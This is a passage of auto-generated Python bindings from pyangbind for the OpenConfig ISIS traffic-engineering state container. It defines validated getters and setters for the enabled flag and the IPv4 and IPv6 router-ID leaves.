self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
})
self.__enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
def _get_ipv4_router_id(self):
"""
Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv4_router_id
def _set_ipv4_router_id(self, v, load=False):
"""
Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv4_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv4_router_id() directly.
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
'defined-type': "inet:ipv4-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
})
self.__ipv4_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv4_router_id(self):
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
def _get_ipv6_router_id(self):
"""
Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv6_router_id
def _set_ipv6_router_id(self, v, load=False):
"""
Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv6_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv6_router_id() directly.
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
'defined-type': "inet:ipv6-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
})
self.__ipv6_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv6_router_id(self):
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
enabled = __builtin__.property(_get_enabled)
ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
ipv6_router_id = __builtin__.property(_get_ipv6_router_id)
_pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS TE state information.
"""
__slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)
_yang_name = 'state'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
})
self.__enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
def _get_ipv4_router_id(self):
"""
Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv4_router_id
def _set_ipv4_router_id(self, v, load=False):
"""
Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv4_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv4_router_id() directly.
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
'defined-type': "inet:ipv4-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
})
self.__ipv4_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv4_router_id(self):
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
def _get_ipv6_router_id(self):
"""
Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv6_router_id
def _set_ipv6_router_id(self, v, load=False):
"""
Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv6_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv6_router_id() directly.
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
'defined-type': "inet:ipv6-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
})
self.__ipv6_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv6_router_id(self):
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
enabled = __builtin__.property(_get_enabled)
ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
ipv6_router_id = __builtin__.property(_get_ipv6_router_id)
_pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS TE state information.
"""
__slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)
_yang_name = 'state'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
})
self.__enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
def _get_ipv4_router_id(self):
"""
Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv4_router_id
def _set_ipv4_router_id(self, v, load=False):
"""
Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv4_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv4_router_id() directly.
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
'defined-type': "inet:ipv4-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
})
self.__ipv4_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv4_router_id(self):
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
def _get_ipv6_router_id(self):
"""
Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv6_router_id
def _set_ipv6_router_id(self, v, load=False):
"""
Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv6_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv6_router_id() directly.
